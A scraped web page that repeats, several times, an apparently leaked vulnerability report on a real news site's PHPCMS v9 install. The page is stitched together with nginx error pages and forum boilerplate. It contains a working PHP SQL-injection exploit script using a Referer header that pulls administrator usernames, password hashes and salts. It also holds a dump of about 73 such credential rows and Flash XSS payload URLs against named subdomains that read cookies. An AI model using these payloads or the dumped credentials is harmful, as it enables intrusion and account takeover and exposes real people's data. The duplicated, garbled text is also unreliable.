请我的世界展示框密码门A44748网络密码
点击联系发帖人
时间:2016-02-26 20:28
问题补充&&
本页链接:
•回答
•回答
•回答
•回答
•回答
•回答
•回答
•回答
猜你感兴趣
服务声明: 信息来源于互联网,不保证内容的可靠性、真实性及准确性,仅供参考,版权归原作者所有!Copyright &
Powered byThe page is temporarily unavailable
nginx error!
The page you are looking for is temporarily unavailable.
Please try again later.
Website Administrator
Something has triggered an error on your
This is the default error page for
nginx that is distributed with
It is located
/usr/share/nginx/html/50x.html
You should customize this error page for your own
site or edit the error_page directive in
the nginx configuration file
/etc/nginx/nginx.conf.分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
问题的根本在PHPCMSv9 的Rerferer注入
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
code 区域Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
经过修改后的http head是这样的
code 区域Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/ Firefox/12.0
Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8
Accept-Language: en-US,q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=7654308-&ntime=&cnzz_a=0&retime=6&sin=<ime=6&rtime=0
Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
借用独自等待的EXP
code 区域&?php
* Created by 独自等待
* User: Hack2012
* Date: 13-2-4 下午8:25
* FileName: phpcmsv9_post_v3.php
* 独自等待博客
print_r('
+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Exploit BY: 独自等待
+------------------------------------------------------+
if ($argc & 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
//取得管理员个数
$cmd1 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
//取得管理员表前缀
preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
$tableadmin = $prefix_match[1] . '_admin';
//取得管理员个数
$cmd2 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
$count = $num_match[1];
echo '共有' . $count . '个管理员' . &\n&;
//取得管理员用户名及数据
if (preg_match('/Duplicate/', send_pack($cmd2))) {
foreach (range(0, ($count - 1)) as $i) {
$payload = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
if (preg_match('/charset=utf-8/', send_pack($payload))) {
echo $i . '--&' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
echo $i . '--&' . $admin_match[1] . &\n&;
//echo $admin_match[1]. &\n&;
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
//echo mb_convert_encoding($admin_match[1],'gbk','auto').&\n&;
exit(&报告大人,网站不存在此漏洞,你可以继续秒下一个!\n&);
//提交数据包函数
function send_pack($cmd)
global $host, $
$data = &GET & . $path . &/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n&;
$data .= &Host: & . $host . &\r\n&;
$data .= &User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/ Firefox/18.0\r\n&;
$data .= &Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8\r\n&;
$data .= $cmd . &\r\n&;
$data .= &Accept-Language: zh-cn\r\n&;
$data .= &Connection: Close\r\n\r\n&;
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '--&' . $
exit('Could not connect to: ' . $host);
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
fclose($fp);
//时间统计函数
function func_time()
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
code 区域0--&mracale:61a79cfd7b4b17662bf2c:AAWFSX
1--&chengang:76d576c20c57eca10486:Fyy1Ld
2--&zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv
3--&grk:bdc29d746bcd81a4575f4a:UKTVlF
4--&zxl:4a07f0c4444febcaa773761:jhA7wb
5--&jh:a01e9c2de530:nM91JM
6--&yuanzong:dce8e5c777a945e39a9a9d1:AWu4Tt
7--&zy:2beccf0918f15dda521bec03:xLaTcB
8--&wy:73c59ce21de8fa61d7bf3e4:If3lwL
9--&hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg
10--&xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa
11--&hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv
12--&?????????:907be2ae09e1eccc0741:a9YeCF
13--&???:1e43cde0ffd0cfcb72e600:92E7bt
14--&wangqianhong:95854cea8dc2de:ajw7zY
15--&qdh:b205d0afe6ae3f2f6bfc2ee:Z2gHlP
16--&?????????:e6d2ceaf8a8beff0f8fb0:RW5U6G
17--&??????:9818065deac:PJUQpV
18--&???:feb8446c69:rA2iCe
19--&??????:f4eecf7d1df6ecd286af:ZbEWQP
20--&hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ
21--&liuyanan:76bcaacdede:EDzgfd
22--&lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf2
23--&???:8c955d13f969cbd36b9a6efaa1cbwY
24--&guorenke:259daa89dcccba53fc40d53d:9lMM2r
25--&wangqianhong2:ca65b191e027bf51a4fef66:Wp8sdM
26--&liyuqin:5e63eef2dc05e3b4fa233d:njxKt6
27--&zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq
28--&gengtingting:f718ca49fb311f33a772:WwgzWc
29--&???:4dd6c6bfa1d28fabc0d4:yMS9EW
30--&???:fc833eecb97e8da0d3b3a2:NFfQ74
31--&syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd
32--&qianduan:2bdeba90ad:pmlpg8
33--&zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm
34--&liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt
35--&zhuting:570edf21f:YFQQMW
36--&zhangzhao:1bf931be0baac03ae7cb703:5wIlIM
37--&zhuxinhui:dfe4ad37ecfd31:KM2Ua1
38--&zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe
39--&qianmengmeng:12bade848e52b13b2d6820:snxMEj
40--&guzhiming:ee39f1ae2fa370c4562edf1:UY3fks
41--&suntingting:0ba2e2216624bdd45fe20:4girVD
42--&gaofei:8fce79e84c3bbb8e8d8904:1qbzqF
43--&yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt
44--&sunyi:2a7e1ea7c13:qAyjs1
45--&xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl
46--&chenwenhui:2e7014feae096afcc19e16ea:CALG1Q
47--&taoyuge:c296bb6e4ad7fb1fdaaa:A5FK2g
48--&zhangxu:5fd42c0ca21ea1cda7a9d8:GYkqhc
49--&huanghui:320e48fd925cb57f5c9554b:nJ3ChN
50--&libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG
51--&zhangling:82aa0a317c9f382ecfe920a:Qc4EZz
52--&liujiajia:ab6a325e51cbe46fd7081:8WVSbS
53--&dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA8
54--&yanling:13151fdb2fd283c60dfabdf:pEaEll
55--&liujing:ff370dadc9b27f:KJpKcA
56--&jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x
57--&chenjiahui:f84cfa5fa080c582c91524:dh4Hh6
58--&shangyan:2aba69a43b4ee43f800afd2:9vHRkb
59--&gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ
60--&sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv
61--&??????:dadec15b5e3daf7:yjvxsW
62--&huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU
63--&nieziyi:e3d3fdb2e86badc197d124:uqXNy8
64--&sunlu:8a0abb7b8abce:BZK6dv
65--&test1:d267c4bd5c72df175c57a6c:mzuHyC
66--&???:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y
67--&?????:56dad8fcc33ec928cd52074:Zaa4wx
68--&nirui:cd373abf474b2b71fc07de:3k3Szx
69--&dongshu:f2bbe7:6TXAAw
70--&wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL
71--&????:4f55848e95efb4eef079:pPQI7N
72--&???:409edfe9db:zlrl3T
最后补充几个反射型XSS:
code 区域http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 12:40
厂商回复:
漏洞Rank:4
(WooYun评价)
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
嘿嘿,学习了~
登录后才能发表评论,请先人人网 - 抱歉
哦,抱歉,好像看不到了
现在你可以:
看看其它好友写了什么
北京千橡网景科技发展有限公司:
文网文[号··京公网安备号·甲测资字
文化部监督电子邮箱:wlwh@··
文明办网文明上网举报电话: 举报邮箱:&&&&&&&&&&&&分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
问题的根本在PHPCMSv9 的Rerferer注入
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
code 区域Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
经过修改后的http head是这样的
code 区域Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/ Firefox/12.0
Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8
Accept-Language: en-US,q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=7654308-&ntime=&cnzz_a=0&retime=6&sin=<ime=6&rtime=0
Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
借用独自等待的EXP
code 区域&?php
* Created by 独自等待
* User: Hack2012
* Date: 13-2-4 下午8:25
* FileName: phpcmsv9_post_v3.php
* 独自等待博客
print_r('
+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Exploit BY: 独自等待
+------------------------------------------------------+
if ($argc & 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
//取得管理员个数
$cmd1 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
//取得管理员表前缀
preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
$tableadmin = $prefix_match[1] . '_admin';
//取得管理员个数
$cmd2 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
$count = $num_match[1];
echo '共有' . $count . '个管理员' . &\n&;
//取得管理员用户名及数据
if (preg_match('/Duplicate/', send_pack($cmd2))) {
foreach (range(0, ($count - 1)) as $i) {
$payload = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
if (preg_match('/charset=utf-8/', send_pack($payload))) {
echo $i . '--&' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
echo $i . '--&' . $admin_match[1] . &\n&;
//echo $admin_match[1]. &\n&;
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
//echo mb_convert_encoding($admin_match[1],'gbk','auto').&\n&;
exit(&报告大人,网站不存在此漏洞,你可以继续秒下一个!\n&);
//提交数据包函数
function send_pack($cmd)
global $host, $
$data = &GET & . $path . &/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n&;
$data .= &Host: & . $host . &\r\n&;
$data .= &User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/ Firefox/18.0\r\n&;
$data .= &Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8\r\n&;
$data .= $cmd . &\r\n&;
$data .= &Accept-Language: zh-cn\r\n&;
$data .= &Connection: Close\r\n\r\n&;
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '--&' . $
exit('Could not connect to: ' . $host);
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
fclose($fp);
//时间统计函数
function func_time()
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
code 区域0--&mracale:61a79cfd7b4b17662bf2c:AAWFSX
1--&chengang:76d576c20c57eca10486:Fyy1Ld
2--&zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv
3--&grk:bdc29d746bcd81a4575f4a:UKTVlF
4--&zxl:4a07f0c4444febcaa773761:jhA7wb
5--&jh:a01e9c2de530:nM91JM
6--&yuanzong:dce8e5c777a945e39a9a9d1:AWu4Tt
7--&zy:2beccf0918f15dda521bec03:xLaTcB
8--&wy:73c59ce21de8fa61d7bf3e4:If3lwL
9--&hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg
10--&xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa
11--&hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv
12--&?????????:907be2ae09e1eccc0741:a9YeCF
13--&???:1e43cde0ffd0cfcb72e600:92E7bt
14--&wangqianhong:95854cea8dc2de:ajw7zY
15--&qdh:b205d0afe6ae3f2f6bfc2ee:Z2gHlP
16--&?????????:e6d2ceaf8a8beff0f8fb0:RW5U6G
17--&??????:9818065deac:PJUQpV
18--&???:feb8446c69:rA2iCe
19--&??????:f4eecf7d1df6ecd286af:ZbEWQP
20--&hangcheng:7b0524fcc8d940bb42b506bd5e5ea533:9Yy5YZ
21--&liuyanan:76bcaacdede:EDzgfd
22--&lizhen:a5f42a630bec5eef3b9f35d00dba861a:bBuNf2
23--&???:8c955d13f969cbd36b9a6efaa1cbwY
24--&guorenke:259daa89dcccba53fc40d53d:9lMM2r
25--&wangqianhong2:ca65b191e027bf51a4fef66:Wp8sdM
26--&liyuqin:5e63eef2dc05e3b4fa233d:njxKt6
27--&zhouxian:5c8f654fab2a33da28fe5e466eeaa0a8:MgiJbq
28--&gengtingting:f718ca49fb311f33a772:WwgzWc
29--&???:4dd6c6bfa1d28fabc0d4:yMS9EW
30--&???:fc833eecb97e8da0d3b3a2:NFfQ74
31--&syj:b4cb5b1d4974121cdfccc7e79548aea7:CvmkLd
32--&qianduan:2bdeba90ad:pmlpg8
33--&zhaiyue:11a53bf3e9baaed25f4a52e7e9fcc6fd:lbiuRm
34--&liangqiong:b626b228d8ebaf9c0bb70bbe841f9d4f:sqIfjt
35--&zhuting:570edf21f:YFQQMW
36--&zhangzhao:1bf931be0baac03ae7cb703:5wIlIM
37--&zhuxinhui:dfe4ad37ecfd31:KM2Ua1
38--&zhuanglingyan:51a63b6c29c004f83cf432c88c23139b:B33lpe
39--&qianmengmeng:12bade848e52b13b2d6820:snxMEj
40--&guzhiming:ee39f1ae2fa370c4562edf1:UY3fks
41--&suntingting:0ba2e2216624bdd45fe20:4girVD
42--&gaofei:8fce79e84c3bbb8e8d8904:1qbzqF
43--&yufan:04b6ef433d9120eace216a0b6da267ea:4k4fDt
44--&sunyi:2a7e1ea7c13:qAyjs1
45--&xushan:fb8f02d39fd89accb1fac4b10b45545e:1HCdsl
46--&chenwenhui:2e7014feae096afcc19e16ea:CALG1Q
47--&taoyuge:c296bb6e4ad7fb1fdaaa:A5FK2g
48--&zhangxu:5fd42c0ca21ea1cda7a9d8:GYkqhc
49--&huanghui:320e48fd925cb57f5c9554b:nJ3ChN
50--&libailiang:7e686c8a7c7ef077b5473cdd0cfa9c47:wRj2zG
51--&zhangling:82aa0a317c9f382ecfe920a:Qc4EZz
52--&liujiajia:ab6a325e51cbe46fd7081:8WVSbS
53--&dingjie:be79dd3f20a128f3f5e7a212c38a5f0e:KnLeA8
54--&yanling:13151fdb2fd283c60dfabdf:pEaEll
55--&liujing:ff370dadc9b27f:KJpKcA
56--&jiangchuan:cdff938f19de3ebe03d0db03a9b2918e:5Ndh9x
57--&chenjiahui:f84cfa5fa080c582c91524:dh4Hh6
58--&shangyan:2aba69a43b4ee43f800afd2:9vHRkb
59--&gaojie:829d3ade3b07d03b7d030a636c75d29f:MkhXcJ
60--&sunxiaopei:9a9d68db67cb1a637bb3bba91ef01257:JesIwv
61--&??????:dadec15b5e3daf7:yjvxsW
62--&huangjianchun:e86a245de0a3c7e51db46a2f831648ea:w41LcU
63--&nieziyi:e3d3fdb2e86badc197d124:uqXNy8
64--&sunlu:8a0abb7b8abce:BZK6dv
65--&test1:d267c4bd5c72df175c57a6c:mzuHyC
66--&???:a92cef551a1ed5d5e20b2ca9e19822d0:jV3l4Y
67--&?????:56dad8fcc33ec928cd52074:Zaa4wx
68--&nirui:cd373abf474b2b71fc07de:3k3Szx
69--&dongshu:f2bbe7:6TXAAw
70--&wk:54b72acff0c1fe504e64c1049feab6fb:BVXnFL
71--&????:4f55848e95efb4eef079:pPQI7N
72--&???:409edfe9db:zlrl3T
最后补充几个反射型XSS:
code 区域http://art.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://cm.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://house.longhoo.net/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://news.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://pinglun.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://test.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://vote.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zhaopin.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
code 区域http://zt.longhoo.net/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
漏洞证明:
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 12:40
厂商回复:
漏洞Rank:4
(WooYun评价)
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
嘿嘿,学习了~
登录后才能发表评论,请先}
本页链接:
•回答
•回答
•回答
•回答
•回答
•回答
•回答
•回答
猜你感兴趣
服务声明: 信息来源于互联网,不保证内容的可靠性、真实性及准确性,仅供参考,版权归原作者所有!Copyright &
Powered byThe page is temporarily unavailable
nginx error!
The page you are looking for is temporarily unavailable.
Please try again later.
Website Administrator
Something has triggered an error on your
This is the default error page for
nginx that is distributed with
It is located
/usr/share/nginx/html/50x.html
You should customize this error page for your own
site or edit the error_page directive in
the nginx configuration file
/etc/nginx/nginx.conf.分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
问题的根本在PHPCMSv9 的Rerferer注入
EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1
code 区域Referer:vote.longhoo.net',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
经过修改后的http head是这样的
code 区域Host: vote.longhoo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/ Firefox/12.0
Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8
Accept-Language: en-US,q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=7654308-&ntime=&cnzz_a=0&retime=6&sin=<ime=6&rtime=0
Referer:http://vote.longhoo.net’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
借用独自等待的EXP
code 区域&?php
* Created by 独自等待
* User: Hack2012
* Date: 13-2-4 下午8:25
* FileName: phpcmsv9_post_v3.php
* 独自等待博客
print_r('
+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Exploit BY: 独自等待
+------------------------------------------------------+
if ($argc & 3) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
//取得管理员个数
$cmd1 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
//取得管理员表前缀
preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
$tableadmin = $prefix_match[1] . '_admin';
//取得管理员个数
$cmd2 = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
$count = $num_match[1];
echo '共有' . $count . '个管理员' . &\n&;
//取得管理员用户名及数据
if (preg_match('/Duplicate/', send_pack($cmd2))) {
foreach (range(0, ($count - 1)) as $i) {
$payload = &Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&;
preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
if (preg_match('/charset=utf-8/', send_pack($payload))) {
echo $i . '--&' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
echo $i . '--&' . $admin_match[1] . &\n&;
//echo $admin_match[1]. &\n&;
//echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . &\n&;
//echo mb_convert_encoding($admin_match[1],'gbk','auto').&\n&;
exit(&报告大人,网站不存在此漏洞,你可以继续秒下一个!\n&);
//提交数据包函数
function send_pack($cmd)
global $host, $
$data = &GET & . $path . &/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n&;
$data .= &Host: & . $host . &\r\n&;
$data .= &User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/ Firefox/18.0\r\n&;
$data .= &Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8\r\n&;
$data .= $cmd . &\r\n&;
$data .= &Accept-Language: zh-cn\r\n&;
$data .= &Connection: Close\r\n\r\n&;
//这里一定要2个\r\n否则将会一直等待并且不返回数据
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '--&' . $
exit('Could not connect to: ' . $host);
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
fclose($fp);
//时间统计函数
function func_time()
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
code 区域0--&mracale:61a79cfd7b4b17662bf2c:AAWFSX
1--&chengang:76d576c20c57eca10486:Fyy1Ld
2--&zoujiachen:e6ec2a15a109fbb95c702ed4a035bbce:BUXrgv
3--&grk:bdc29d746bcd81a4575f4a:UKTVlF
4--&zxl:4a07f0c4444febcaa773761:jhA7wb
5--&jh:a01e9c2de530:nM91JM
6--&yuanzong:dce8e5c777a945e39a9a9d1:AWu4Tt
7--&zy:2beccf0918f15dda521bec03:xLaTcB
8--&wy:73c59ce21de8fa61d7bf3e4:If3lwL
9--&hongli:3359bbb23b10fe3c3ed9de77e0199d28:zbY3dg
10--&xueshan:e8f3c711cc4d319573cef3c6c8c441fd:AvXHZa
11--&hl:8ca34a75aaa599b8d7a5cbdd9d1a06c5:bLP1Qv
12--&?????????:907be2ae09e1eccc0741:a9YeCF
13--&???:1e43cde0ffd0cfcb72e600:92E7bt
14--&wangqianhong:95854cea8dc2de:ajw7zY
15--&qdh:b205d0afe6ae3f2f6bfc2ee:Z2gHlP
16--&?????????:e6d2ceaf8a8beff0f8fb0:RW5U6G
17--&??????:9818065deac:PJUQpV
18--&???:feb8446c69:rA2iCe
19--&??????:f4eecf7d1df6ecd286af:ZbEWQP
